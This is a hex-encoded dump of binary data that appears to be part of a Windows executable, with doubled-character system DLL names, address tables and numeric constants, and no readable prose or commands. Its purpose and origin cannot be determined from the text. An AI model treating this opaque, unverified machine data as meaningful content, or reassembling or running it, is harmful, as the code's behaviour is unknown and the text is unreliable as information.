00f2fd1f04d6072eb38d11262b70bc75047400c53ea39a073c961b500468cb479c9b53553eeb056d0c7400c53ea75985f47400c52eb388153ea5940f3eeb35a5f57500c53eeb3db5ed7500c53ea2a83436ab910c36aa8815260b408c76267500c4260b4084471f7500c52eb288141e82bb272eb28b172eb28814168ab32f1e83bd201e87ba233c22c67b137500c53ea79f061e83b8251e8254cbb57300c51e827cebbd7300c526ba5cc3b57300c526ba44b3dd7300c53ea39c013ea399043ea39b063c961b500468cb479c9b062c02fecaac7300c52eb749c2a47300c514a2a1e6f12c32ce2f497300c53cd1ea07142bd7732a7400c53f1c131ca9be0100f0105b4400755beb3eeb1dbbc4720044cf8eea9b7400e8c22f0500c53c961b500468cb479c9ba500000000000069109b8400000000c53eeb1da5da720044cf8ec0b17400e814f80400c53c961b500468cb479c9b53d8733e7c0b720074536f733e6512720074ba86430e82f57200662e4761a68ccf8e96e77400e82ec20400ebef0b105f40c53c961b500468cb479c9b0f84c1d5782c40c1fd5034471fcb6fcc682bba98ca73734083c3791a09091700b7cb7b078a64f9227c490038c70909000048cb4b3714b817cf4483c1c9606c00c35d9ec34337ea77781a008545b57af0ea1d131b008b4320c19f490014389bc3cf606c00cb7b078bbc80c3589fc188b772c0008361dd77c340838938ff4e8923e44fc287c448e47529c5b5c3d7781478c3ff501c70cb47e47f9c0f000025b6a0000033000084c1d5782c5f1fcb6fcc68c35291cd4cbc60fdd18f490038c716160000e8e6bb4a007c4b3714bad24c3074ca55d529e5a5a9754ed213131700b7c34040731071721400b7c3402361582e0074432002ee04008545b97c864c3014f85bc3c06360cd4cbd7ee287cb5b00b7cbe04b2848c34023ce2006008b4c8fc3d7781478cb47e47f9c0f84c1d5783458c1c5682c5f1fcb6fcc68c352eaf388cd4cc69a554545b560fd411c4a0038c716160000e896ca4b007c4b3714c0a0ca55d529e4a4a97573ef3ed30500eb010243792d006fd8c34023c2d500007473b0c340234c762d00744c8fc3d7781c70cb47e47f9c0f0000aaefc5682c40cb6fd470c3868d31b10048cb7a078b79e43dd0050048c38663dfb10048cb7a068a72bf4700ff00ebce6dcbe74004204cc1c1686c09f9b901000048c5d97064bfeaa8a518008545b4add6b8f3606408cb47fcfb0f000084c34f971bcb6fbca2fd1f94a0a48000008b522bfd1f9ca8ac880000ba7a3fff0089c18080c307a8b4900000f2fd1e51a012fd1e59a01afd1e498094c5c990387899090048c5c16804c8dafc31007a45b5728c4023c3220900f2fd1f54606408cb47940b980f000084
c1d5782c40c1fd5034471fcb6fccab5291c3797160fc94720f37c97c679756ab76b6b8010000e854b509008360141cbceebd04000040c47d8d655947b558eb7a79e249a8090083601810d77cb631c675625e47b558e8797cb6b1080000e86d8c090083601d15cb60b631c5766e5247b558e9786053b631d7647eb3a9100000e88b6a090083601ebdb631d764605c47b55cea7f7eb499200000e8a140090083600ca7c3ff501c0bf3455e93c3d778143f9b5488cb47e47f9c0f000084c34f9106050116171ec5e5a181c96d1cf000000f2659b880c38e44e6a700487bf78cc1ccaa6479bec77a4b7a3fff00b9399f1f0041ca72b0c25330987808008bc61217c1cd606408c1d57874a2fd1f54607418c3df7064b2fd1e55606ca0091f01000dfd1f6502f245b535c3fe027d77649acefa3c630311fd1e64da2c4bcb8accfafbcfce1a17c5c9606c00c1cd600c60c5d9706408c5c82a2bcf4586c5c1684428c1cd6004c86c800400e86b4f33007b44b440b17a8b4478c3cf60640dc64d34fd1f54606cc3443dfd1f4d32e4de322fc1cd6014c2fd1e55600cdafd1e655004c81d08020014f79744279877070048c3c76864fa7a3fff00e859b60700f2fd1f54606c00c3c6a2a77bff24e77d8d00f0279c90c4e0000048c94534f00000411f010105069e0f00000000000000008c131bcb6ffc5576f3f3fa8dcd8c3bffc10045c8c54940ca4acead2b8d209cb810101891c5682c2beb41d578208ddd702837f3bd591ffac60ed1988923c26843db98c1dd700468c3cf600464cf8efb3ec00024223a3a434a4b8585cd8cea2fc00044cd8ce92cc00033f388cb47d44b988bcb6fd470c588f072870041f8a21b000048c1cd6004c8ed05000048cb47fcfb8bc34f8ccb6f8467265998e727d9b0ca5ade27f099c26be9755e6bc27bf9741c2dcdc998d7588520fd1e418095ce433afd1e51880f8780e1210000c787f8b0080000ebc6ea836064410100000f589732fd1e55601c79f8bb020000f2fd1e4d7814f783600c0a220000c78360042404000048c307a8b4900000f2fd1e5d685c34c7cf605c905f4a0200f027eec9275c507418cb47acab0f0084c1d5782c44c5c56804771fcb6fcc69c272b0c2535381e29c961d006fd8c3884b2b6b40c35a99c34a898939fe4ac188813fbb008361dd778923e44fc28fc436b2542839757de125cd00008b5333e5e6dc854e0038c7090900008348347484e7b8b21d0074488bc3d7781478cb47e47f9c0f000045c5682c40cb6fd4702bb25279048b60fd376f4f007ca320e81f474f0038c709090000eb9ff14cb120632e00aabf00732318c34186c1880cb2bb008362de77c3498a8939fe4e8920e74fc28fc436b24c3039755965c5c96064c9dd7074d9dd707c
14c1c1687418c5d9707c10c1cd60046cc1c9600468c5c1686ca0e5f2000014f0f386de4f007ca320e86e364f0038c709090000e8b3f450007c4b37b7cb47fcfb0f000084c1d5782c5f1fcb6fcc682b9a724427808a1d00b7cb7b078a7137e830bc1fc38e7ec1ba00b9bb020000837cfe747c49c43c00b80000757f31c28c68ebb638797563ffddd71d0046b801000048c35330c0ca1d00b773f8b7b54a4427f4fe1d00b7c34337eaa2a413008545b5d852ea707114008b53534427aca51e00b7c35c9bc1881fa0ba008361dd77c344878938ff4e8923e44fc287c40e82552938855eaf78874023b0f750007c4b3714e931f388c3d7781478cb47e47f9c0f0084c1c5682c44c757efe19ac19858c2c84b40c1d95841c2c84b81d94059c2c84b8bcb50e7b6c2c84b81d94c55c2c84b81d97069c2c84b40c1d97861c2c84b8fd744d70f0084cb6fa400cbe740143048c5802aa2850083e7400c2841f9bb0300004576fa8dcdcd60049aba000040bfeaeced140048c18c6fc1ab0048cb478c8b0f84cb6fc460c38654f2ab0048c5cc434acb7bf97770f9eadcdb120048cb47eceb0f000000000000000000aa0069109b840000000048cb6fe407a1b238af8f206ccb47cccb4ac5682c07a1fa702ccbcca1f2782cb1793f0000de6d682c07a1fa702ccba569212baf2e840073677269212bad2c8400767cf8ba4722e53aba4725eb020f000084cb6fa4cbe740143048c3cf605c30c1cd600c60c3cf605438c1cd6004c8ee06000048cb478c8b0f84c34f8cc1d14858c1f96850c1f15868c1c1405d1dc367a4cb6fcc68c3519bca7ac2e16db20d00c049d8554cc3ce5599d95840c3ce5599d95c4db736d0647945c3ce55af308f00c043cb4c0540b736c2767945c3ce55af2c9300c043cb4c0643b736c1757945c3ce55af2e9100c043cb4c0045b736c4707945c3ce55af318e00c043cb4c0c49b736c87c7945c3ce55af2f9000c043cb4c1458c3c65d58c3884b8929efc621e4f327e372498b63f021704940c3c65d58c3884b8929e1c821e3f427e372498b63e839704940c3c65d58c3884b8929e2cb21e2f527e372498b63e435704940c3c65d58c3884b8929e308c33727e372498b63e233704983884bc3c65d588929e4fb27e372498b63e1307049e037dd020048c35b78a9757c40c3c65d93ca451cb8ac707c40c3c65d93ca4504a0a07c7c40c3ce5593cb4408f234d2647c40c3ce5593cb440ef434e2547c40c3ce5593cb440d8a88bab9606000486be2b54a76753d20200074526e753d404000747a4673fab44578c3ce55938b0be8cc6fc3ce5593a3deb6c3ce55938b0ae9fc5fc3ce5593a3ddb5c3ce55938b09eaec4fc3ce5593a3dcb4c3ce55916719f00f00c127e384a13f1ffe01b7c3ce
55193978c3ce5558c3fe4dbbcb682182fe3d4074477bc3ce55aa5b1e0000de717068c3ce75bb8340c3ce5599c15858c3ce5593cb286149c3ce5531713028c3ce559b8587c118bba300c3c65d51f95b1c000074ca616162e3434bca8bc86168c3ce7578c38340c3ce5558c1c15858c3ce5593cb286149c3de459bc9222162e3434bca8bcb2228c3ce5558c39d5ec1d900b80ee6000033e19ec1c05d9b448bc9cf43feea9194100048c3c65de6b7491864714d47b58934f1b749007c714d47b5893affb7490c70714d47b58939fcb7490a76714d47b58938fdb7490975714d47b5893f878a8263e37744b36be9756b9c6be9757a8d7bf9745d60c98a0b606000ebf45747b5893e4547b59125e5f85b47b5893d4647b59126e6ec4fc9a2dc6060007cfe3d4074738cca11d98fedec4fc3ca1118c18f4ec3d7781c70c3ff506408c3f7586c00cb47e47d9e0f0084cb6fc4ab7af8756198ccbf7d7bf9766ff082c1540038c722220000ebe0e3b5f6540038c72121000048cb47eceb0f008c131bcb6fccc8adb9030074535b60dcd7bda9030074488bcb47e47b980f000084c1d5783c50c1fd5004771fcb6fcc68c35192c37211feea0300747b79cd601cb3403c265048b6ff7f00dcebebd8f0c446c56814b0bd0892a700007451d337813454c81102040014fcd1c32587a700008bc76814b3625e570c1f040074ff501cd3e38b625e573e2d0400744d8ec3d7786408c3ff506c00cb47e47f9c83131bcb6fcc68c352314e5d04007c60dc34c8484380cb47e47bb24c5e04003384cb6fc4c0637004007c63df77cb47eceb0f33da59720e00ffda9bb00e00cc0000000000802f227d7976fa854fc28dc759934eb8f754514ab8ef5e4ecb43d8514ac385c05eaf6a95db5c4077e9a07881c3400bc98677eaa37c4fbe3e89cb43e86d7ef0b990d1f3030f000000000000000000000084c1d5782c5f1fcb6fcc68c35291c5b0b1c1b200b7c34427dc3400008545b4566a63f497c3589bc344276a7d0000b7cd45b47b84cb64e529f7e8275363e1eae931f388c3d7781478cb47e47f9c0f000084c34a78f4175a00665f317c7730f3038b2b2b74744bcbfbf341b8691545007579b6b1090200665f6849179b54030f0084cb6fc465c6ca7970c34183c25a39e50d0000b8b901000048cb47eceb0f00008c1316ce9350c3519bc2601bb4c74288b7f60448c75aa56752cacb48452e3354f32f944fd2992bab846ff2982aa089c19f0458c3c8539bc340404b4843feb7420c7b7e05b9f742806310bc4fcb847ff983c24292b28e0f970033000000000000000000000000aa0069109b840000000048cb6ffc5cc59d3068c5d5782c457ee897c1d9703c5467fb9d424d91b629c79739351000004d76e82181647127
c063e2f0bdc0169bf00f00be87c5034d76e821879aa3c79f3068c7d7782c40cb47d4e2310f0000000000000000000000000000000000000000aa0069109b84000000004cc75295c7599bca7be81f89f670000049ca7bd8563c0263faa27c46c2498b4ac38873f3c783ba35030049c879788000000f89ef6b02000fb59f70feab00010e8c28aa010049c2488fc75497c372b0c24384c74d8fc2790157edc27bb9c27038cc1f12434e1f5c5ce0ff1e10404e1e5d44f8b8c34a02a50069109b840000000048c34a8dc1809bddb400bcc8070df6c3b400494aca361e2174b400df6bb400c175b400cf7bb4000bbeb50010a5b5002095b5003085b500c87cb40060d5b50070c5b500f044b4008035b50048fdb5009025b500b005b500e551b4000f105b4400c3ccb8bd6cef81cb8bc38142c181cbccb8bd4e4bb9f44064ef814cccc842c1ccb9bc8280cb30fc606df1fc707fc3a5f6dcc7890db8fd424c4bb9fc4046c58966efc1404cccc04243c2400848818381cb48814e4bb9f4468d814cccc844c7a5f61b814e4bb8f5468d816e22cdc944c7531b814e4bb8f546404bb9fc4c8f816e22cdc94440ccc04ec58fc78989c1424c4bb9fc4640c58989c1404cccc044cfa5f6dcc7890db9fc4244c58988c040cba5f6dcc7890db8fd4244c58966efc140cb53dcc78989c14244c58989c140cbcc101f4cc78989c1424c4bb8fd4640c58989c1406e22cdc144cfa569109b84000000004cc78989c1424c4bb8fd46484bb9e45c42c58989c1406e22cdc14448ccd85ecdcc1f140e464fc289cb42d151b735cc7b671c27e080cb6211ff1f140e42cb42d1514e1e1a4767ea8cc643818828ee088b0c8800000f2668b1bc77361c8b9a007661fe2bc20000660069109b84000000000f2668a1ef2660b9ff1f140e051f5c461a58c940418000000f2668c18f2660d99f1f544eaaaf1f5c46baf9b636c62668e1af2660f9bf1f544ecacf1f5c46dadf266881cf266099df1f544eeaef1f5c46fa85d8a22668a1a9ca639f7027e92ae7031f140e42cb42d159ca6bf85dc643818828ed70687a000069109b84000000000f1e50b1ff1f140e42cb42d159b636bc9aa6ca63ef7b7944c4890c071f5c4ef2ff1e59b8ff1e50b1b9c24800cc105f400f246aa1ef2462b9ff179c8e0a0202000f1f140e051f5c461a58c940418000000f246ac18f2462d99f1f544eaaaf1f5c46baf9b636c6246ae1af2462f9bf1f544ecacf1f5c46dadf179c8e4a4202000f246a81cf246299df1f544eeaef1f5c46fa85e892a15611d1c70000f0105b4400494acbc71f544efab8cb6af959ca6bf8e637ce7b635fc34a89cb6211ff1fd8c71f140e051e1944c74a8c66e88ec643818828ee731c672628eae66b69105b44000f2668511f
2620061f544efaff1f5c46eaa8c968698000000f2668317f2660296f1f544e5a5f1f5c464a09b636c62668115f2660094f1f544e3a3f1f5c462a2f2668713f2660692f1f544e1a1f1f1c067fdba126685159ca639f7027e98cc643818828ed706e7c0069109b84000000000f1e1049cb6af91f1f140e43b636bc85b9ca63ef7b7c494e1f1a4b4e1e1a041e1048c248000f00000000000000000000000000000000aa0069109b84000000004863fa98ca7bf07a50d437c6736072f61a8b3b3e0e7f5964b73e88b6373e37c6729ba3c643818828ea766a52c845b47b858b3b3e0e7f7944b73e88b637bd84b97bf303d8db435b273c53d98828eb76437fc38a49733f0e7f2e13c3ca4940737f4e027d3904c3ca5158737f4e1a654875c3ca5950737f4e126d5b66cb42e169b636bcb884ca63ff52c643818828ea77efd3c38a49733f0e7f6e53cb42c941b636bc9ba7ca63e7ec68cbcb42c940cb42c940cb42c940c3871d5947c78047c68173fadadb435b273c0f0000000000000000000000000000aa0069109b8400000000ff1f2c000000000000000000000000008c151dcb6fcc68c36160c70d08cb47e47db4af2a9300338c151dcb6fcc68c361028705950075c77570cb47e47db4c3469300338c151dcb6fdc78c361a2c38a8a9b58c1c5680ca1dd70046cc1801a729a00b3c7ce35fbde3d20c3c62d8877f696006fd8cb47f46d9e0f8c151dc361a2c38a32fa48b93d0500c0cf9b554a4a9c9e0f8c151dcb6fcc68c361d9fa81cb47e47db4a7da6b00338c151dcb6fcc68c361a2c38a8a83e0365c7d006fd8cb47e47d9e0f8c151dcb6fcc68c36153bb02000048cb47e47db4f38e6b00338c151dcb6fcc68c361a2c3ce0dc38340cb47e47db4e9946b00338c151dcb6fcc68c361a2c30e0d8800008b8340cb47e47db40a706c00338c151dcb6fcc68c36153bc05000048cb47e47db423596c00338c151dcb6fcc68c3616a3d3d80000000747fb2ba030000e8453e6c006fd8cb47e47d9e0f8c151dcb6fcc68c36153bd04000048cb47e47db4641e6c00338c151dcb6fcc68c36153be07000048cb47e47db49de76c00338c151dcb6fcc68c361a2c3c62580f9ae40006fd8cb47e47d9e0f8c151dcb6fcc68c36153b108000048cb47e47db4a8d26c00338c151dcb6fcc68c36153b108000048cb47e47db4c1bb6c00338c151dcb6fcc68c361a2c3ce0dc38340cb47e47db45f642d00338c151dcb6fcc68c36161c61d18cb47e47db4764d2d00338c151dcb6fcc68c361a2c3c67d78cb47e47db466314100338c151dcb6fcc68c361a2c38a80b93d0500c0b4788db9251d00c0b47037f32beebdb901000048cb47e47d9e0f00000000000000000000000000008c151dcb6fcc68c361a2c38a32
fa48b93d0500c0cf9b554a4a89cb47e47d9e0fcc00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c089480100000000c881480100000000d69f480100000000e4ad480100000000f2bb4801000000006c234e01000000005e114e01000000004a054e010000000038774e0100000000a2e84b0100000000b6fc4b0100000000d09a4b0100000000e4ae4b0100000000004b4a01000000001e554a010000000032794a0100000000460d4a010000000062294a01000000007c374a010000000092d94a0100000000a8e34a0100000000c2894a0100000000d8934a0100000000eca74a0100000000feb54a0100000000125e4d0100000000206c4d010000000038744d01000000004c004d01000000005e124d01000000006e224d01000000007e324d010000000096da4d0100000000aee24d0100000000c68a4d0100000000eea24d0100000000fab64d010000000008454c0100000000165b4c0100000000206d4c01000000002e634c0100000000400d4c0100000000521f4c0100000000602d4c0100000000763b4c01000000008cc14c0100000000a2ef4c0100000000b8f54c0100000000c4894c0100000000d09d4c0100000000e0ad4c0100000000eca14c0100000000004e4f0100000000105e4f0100000000226c4f01000000002c624f010000000038764f0100000000440a4f010000000056184f010000000068264f010000000082cc4f01000000009cd24f0100000000aee04f0100000000bef04f0100000000cc824f0100000000de904f0100000000eaa44f0100000000f8b64f010000000008474e0100000000145b4e010000000028674e01000000007c334e0100000000000000000000000086cc4b0100000000743e4b010000000062284b01000000004e044b01000000003a704b01000000002e644b0100000000105a4b01000000000000000000000000a08c2c808101000010a9b9808101000000000000000000000000000000000000000000000000000068ed8580810100002c54788081010000d079a9808101000000000000000000000000000000000000ccb57980810100004ce1ad80810100004c35798081010000000000000000000000000000000000000000000000000000000000000000000090c9588181010000306a5b81810100000000000000000000c8fd3481810100002c062a8081010000b09a2a8081010000553b05050118194e451d1b0615041d06016e000000
00000040763781810100002c062a8081010000b09a2a808101000062030544410d00030c02151d06016e00c0f63781810100002c062a8081010000b09a2a8081010000620305444113001318594e0b12574c090b09131c68000000487f368181010000ac802c808101000063101e8de10100000000000000000000000000000000000004040000000000002025968a1900000000000000000000000000000000000000000000000000000020e4c4808101000038fcc4808101000078bcc48081010000b87cc480810100006161646476766161707069693333323200000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6666696962626565727273732d2d6c6c31312d2d31312d2d31310000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d737379796e6e636368682d2d6c6c31312d2d32322d2d303000000000000000006b6b656572726e6e65656c6c3333323200000000000000000101000003030000462a1f322d00030c63000000000000000101000003030000462a1f35341700650101000003030000462a1f34221122370d191065000000000101000003030000462a1f20361122370d1910650000000002020000030300004927071d1d080d05131f26311b1d1d0a020d3f3606171d06012b3d780000000070b8c880810100008048c880810100008840c880810100009850c88081010000a860c88081010000b870c88081010000c800c88081010000d810c88081010000e42cc88081010000f038c88081010000f830c8808101000008c1c9808101000018d1c9808101000022ebc9808101000024edc9808101000030f9c9808101000038f1c980810100003cf5c980810100004089c98081010000448dc980810100004881c980810100004c85c980810100005099c980810100005891c9808101000064adc9808101000068a1c980810100006ca5c9808101000070b9c9808101000074bdc9808101000078b1c980810100007cb5c980810100008049c98081010000844dc980810100008841c980810100008c45c980810100009059c98081010000945dc980810100009851c980810100009c55c98081010000a069c98081010000a46dc98081010000a861c98081010000ac65c98081010000b079c98081010000b47dc98081010000b871c98081010000bc75c98081010000c009c98081010000c40dc98081010000c801c98081010000cc05c98081010000d019c98081010000d41dc98081010000d811c98081010000dc15c98081010000e029c98081010000f039c9808101000000caca808101000008c2ca808101000018d2ca808101000030faca8081010000408aca8081
0100005892ca808101000078b2ca80810100009852ca8081010000b872ca8081010000d812ca8081010000f832ca808101000020ebcb8081010000408bcb808101000068a3cb80810100008843cb8081010000b07bcb8081010000d01bcb8081010000e02bcb8081010000e42fcb8081010000f03bcb808101000000cccc808101000024e8cc808101000030fccc8081010000408ccc8081010000509ccc808101000070bccc8081010000905ccc8081010000b874cc8081010000e02ccc808101000008c5cd808101000038f5cd80810100005895cd8081010000804dcd8081010000a865cd8081010000d815cd808101000008c6ce808101000028e6ce808101000022ebc9808101000038f6ce8081010000509ece808101000070bece80810100008846ce8081010000a866ce80810100005f003d031216014c28000000000000005f003c0701060f6c5f002f111210020d6c000000000000005f002c071007020d006c0000000000005f002b1c011a10020d006c00000000005f003907120717020d006c00000000005f00291306171b1d11020d006c0000005f003c0f1e11020d006c00005f003a04030b6900000000005f002f04064402345f002d171607061b0a177400000000005f002a1b0f0d050e090b01640000000072171607061b0a175c280000204e0b12770000000000000020440109091111653d3d00003e003e003c003c00212100003d003d00211c3d005b065d00000000006f1f151713151b1d720000002d133e002a2a00002b002b002d002d002d2d00002b2b0000262600002d13142a2f2f0000252500003c3c00003c013d003e3e00003e033d002c2c0000280129007e7e00005e5e00007c7c0000260026007c007c002a173d002b163d002d103d002f123d0025183d003e00033d3c00013d261b3d007c413d005e633d006016101215030e0942270000000000006016141615030e094227000000000000601615020d004b2760140d09150a09412700000000000000600c030c020d4c530715151d0a4347121413164327000000601307061b07094027000000000000006016140312164544011607060716171b1d5527000000000060161306171b1d5244010909111d07094744011607060716171b1d5527000000600401030714191854430c011d07060716171b1d52430f031c06071742270000601310020d0d135244010909111d07094744011607060716171b1d552700000060161306171b1d52430c011d07060716171b1d52491d111713151b1d5527000060161306171b1d5244011607060716171b1d52491d111713151b1d552700000060161306171b1d52561403121645430c011d07060716171b1d52491d111713151b1d55270000000060161f1b06
01140d4c440d1a031c0d020608080b1a544d0c115727000000000060050d48561306171b1d52430c011d07060716171b1d52491d111713151b1d55270000000000000060050d48561306171b1d5244011607060716171b1d52491d111713151b1d552760050d48561306171b1d52561403121645430c011d07060716171b1d52491d111713151b1d55270060030c1f0959430c011d07060716171b1d52430f031c06071742270000000000601511105452171101071c070709402760250d48603206001d49000000000000600c030c020d4c56101215030e094227600c030c020d4c56101215030e0945430c011d07060716171b1d52430f031c0607174227204e0b122c065d0000000000204401090911113e065d000000000000600f0203074943020d001f1a0e40270060101c0d020608080b1a5444010909111145430f031c0607174227000000000060101c0d020608080b1a544401090911113e067d430f031c0607174227000000600d0c0f0f06020144561306171b1d52430c011d07060716171b1d52491d111713151b1d55270000600d0c0f0f06020144561306171b1d5244011607060716171b1d52491d111713151b1d552700000060050d48561306171b1d52430c1f0959430c011d07060716171b1d52491d111713151b1d5527000060050d48561306171b1d52561403121645430c1f0959430c011d07060716171b1d52491d111713151b1d55270000000060041d170f0c040a434907071d1d080d05131f175246091d520727000000000060041d170f0c040a434115111d111d5444011607060716171b1d5246091d5207270000000000000060161306171b1d52430c1f0959430c011d07060716171b1d52491d111713151b1d5527000000000060161306171b1d52561403121645430c1f0959430c011d07060716171b1d52491d111713151b1d552700000000000000600d0c0f0f06020144561306171b1d52430c1f0959430c011d07060716171b1d52491d111713151b1d55270000000000600c030c020d4c530715151d0a43541c1a1704054447121413164327000000006f1f151713151b1d520200022000000020742d09154564211610111b19041b1d5527000000000000206223121645632f0d12005364211610111b19041b1d52411554082800000000206223121645632f0d12005361330013185e27000000000020632f0d12005368210c171313110b115964211610111b19041b1d552700000020632c021d1c091111456f2d080f0617546c230c02151b1d55270000000000000000000000000000050500c0cb0b000000000000000000001d1d00c0c40400000000000000000000969600c0c404000000000000000000008d8d00c0c80800000000000000
0000008e8e00c0c808000000000000000000008f8f00c0c80800000000000000000000909000c0c80800000000000000000000919100c0c80800000000000000000000929200c0c80800000000000000000000939300c0c80800000000000000000000b4b602c0c80800000000000000000000b5b702c0c808000000000000000000000c0c000000000000030300000000000009090000000000006d6d737363636f6f7272656565652e2e64646c6c6c6c0000432c1d373d111d24221d0c06160073004c05498081010000000000000000000098d149808101000000000000000000005008588081010000104959808101000094dd49808101000094dd49808101000068254d8081010000cc814d8081010000305f6f80810100004c236f80810100000000000000000000eca549808101000010435380810100004c1f53808101000040317180810100007c0d71808101000064096d808101000094dd49808101000048216980810100000000000000000000000000000000000094dd4980810100000000000000000000f4bd49808101000094dd49808101000084cd498081010000602949808101000094dd49808101000060b1d18081010000b061d1808101000038fcc48081010000f021d1808101000030e2d280810100008052d28081010000e032d2808101000030e3d3808101000078bcc4808101000070a3d38081010000b063d38081010000f023d3808101000030e4d480810100008054d48081010000e034d480810100004095d580810100009045d5808101000020e4c48081010000b87cc48081010000e035d580810100006161707069692d2d6d6d73732d2d777769696e6e2d2d6161707070706d6d6f6f646465656c6c2d2d727275756e6e747469696d6d65652d2d6c6c31312d2d31312d2d31310000000000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6464616174746565747469696d6d65652d2d6c6c31312d2d31312d2d313100006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d666669696c6c65652d2d6c6c32322d2d31312d2d3131000000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6c6c6f6f636361616c6c69697a7a6161747469696f6f6e6e2d2d6c6c31312d2d32322d2d3131000000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d2d63636f6f727265652d2d6c6c6f6f636361616c6c69697a7a6161747469696f6f6e6e2d2d6f6f626273736f6f6c6c6565747465652d2d6c6c31312d2d32322d2d303000000000000000006161707069692d2d6d6d73732d2d777769696e6e2d
f8774fc000000000000000fdfa0700000000000000000000000000000000000000b08f3f00000000000000000000000000eed13f00000000000000000000000000f1ce3f0000000000000000000000000010100000000000000000ff000000000000807f00000000000000e6b201000000e08a3f00000000000000d4127c23000010b63f000000000000009fcea0f6246a2b5d3f00000000000000f00fa295fcb4bc033f0000000000000000000000ff000000ff00000000000000010100000202000003030000000000000000000000000000000000900e23e6643f000070a47bc4543f000060f52ccd4b3f0000a0d6e2ef443f0000a0ed79b5be3f00005058931fbb3f0000c0b18f79b83f00008010ced5b43f0000f09ad135b13f0000a023899bae3f0000e0550027ad3f0000501f10cbab3f000000535491a93f0000d0136e3aa83f0000f054f6cba63f000020d90c6fa53f000070b3540ba33f0000a0a63ea6a13f0000b0751349a03f0000a0a1bb1a9f3f000020c166269e3f0000c0c257f79d3f0000c0a746829c3f00009081fc4e9c3f00008081b91c9b3f0000e0d8ba279a3f000010a9f2ed993f000040c397b3983f0000c058447b983f0000d02a590b973f0000c06ac0c3963f0000d079999a953f000020d90c5f953f0000009a2011943f0000901df3d2933f000010c594ec923f0000a0d175aa913f00007014a268913f0000b01e2928903f0000c0e80c948f3f0000f0d6a2348f3f0000904231538f3f0000301c6ff28e3f0000407496138e3f0000608bebb28d3f000010420ded8d3f0000e088d50f8d3f000050602ba88c3f0000e048d0cb8c3f000030e306668c3f0000a00f9d868b3f0000d0eeb13b8b3f000020a16a5f8b3f0000304730f28a3f0000604182168a3f000040c07e4b8a3f000040d4cdef893f0000f0ade902893f0000b06dd3b9883f000000147dde883f00006061c274883f00003096baa4873f0000000375ce873f00003028d777873f000040a6c19e863f000090fded39863f0000a00e7661863f0000d079998a853f0000a0ffd732853f000070a00f65853f0000b04cca8d843f0000d0346936843f000030b96d5f843f000040aad086833f00007078992d833f000010f4025a833f0000a0dd4181823f00008055442c823f000000ec0a5b823f0000a061fa85813f0000b0e6c62e813f0000a00b4f5a813f0000c000f887803f000080161a33803f0000301dcd5f803f0000a062dbd9ff3f0000703f0c83ff3f000060ddd1acff3f0000808c9a56ff3f0000003d827fff3f0000105fa728ff3f0000f0b253d0fe3f0000a0b822fbfe3f00008050b2a3fe3f000090fae14afe3f000010f75472fe3f000030769a1dfe3f000010988cc6fd3f0000e04c
80eefd3f0000d064e096fd3f0000f06fe3befd3f000080eeca66fd3f0000b090ec0efd3f000090264531fd3f000050602bd8fc3f000020aecc81fc3f000020f0b9aafc3f000080766653fc3f00006061b97bfc3f0000e0102e1dfc3f000030f5c0c1fb3f0000700e52e8fb3f0000d0cc4f97fb3f000070d0d9bdfb3f00007079a964fb3f000000589e02fb3f000030bc6028fb3f000040e6b4d7fa3f000030969efdfa3f000050dcd29bfa3f000090c8dc41fa3f0000404ba16ffa3f000070d46b0afa3f00004064d130fa3f0000d05a90dcf93f00005088e7f9f93f0000d0dc69a3f93f000080a8a24cf93f000080ab8469f93f0000e0f5c112f93f0000d0371f3ef93f000070d1bcdaf83f0000e0a20085f83f0000408caaa1f83f0000a09db64cf83f000030a73868f83f000010c90a14f83f00005053fb3ff83f000020360ad4f73f000090815188f73f0000c03596abf73f0000e022454ff73f00000079d263f73f00003028d707f73f0000a000523af73f0000706204dff63f0000b0dd54f0f63f00008032ee95f63f000000e19eb6f63f000050a95b6bf63f0000708b3e0cf63f0000b0570f21f63f0000f04db6c1f53f000080fe50e4f53f00006049789bf53f0000a01ecdb9f53f0000704ea85cf53f0000f0581072f53f000020de2410f53f0000300ec337f53f0000305976d4f43f0000403f3e8af43f000070f0e3a8f43f0000f09ce94ef43f0000b0f4e36cf43f0000f0f7ce02f43f0000c0765c21f43f000030615dc0f33f00005087fae1f33f000050190683f33f000040e7d7bcf33f000030c1605df33f00004067947ff33f000080c99d18f33f00001048ad39f33f0000005345dbf23f0000605a0dfaf23f0000606e5695f23f000000cfb7b5f23f0000700ce554f23f0000a0b6ac77f23f0000d04d4717f23f0000f0e1ea36f23f0000304368d5f13f0000a061faf5f13f000050ada695f13f000060465ab2f13f0000e0dca052f13f0000e0a0fc72f13f000080b2ee12f13f0000d0c1ed32f13f0000e03ec5d4f03f0000d049a2f4f03f0000a0e21994f03f00008059a3b5f03f0000702ec455f03f000090416876f03f0000f0c2eb16f03f0000a0227a37f03f000050b0ebdbef3f0000a0d66dcbef3f000030342ffbef3f00001099b3eaef3f000040454f9aef3f0000e0982189ef3f0000f0138bb8ef3f000070363ea8ef3f000080202757ef3f000010e26446ef3f0000300b9d76ef3f0000f08bce65ef3f000050e47014ef3f000060843703ef3f0000303cef33ef3f0000c0ebd922ef3f0000105342d0ee3f0000401242c1ee3f0000401946ceee3f0000306876ffee3f0000004f72ecee3f0000d0ed719dee3f0000a0847f8aee3f0000707369bbee3f0000508a
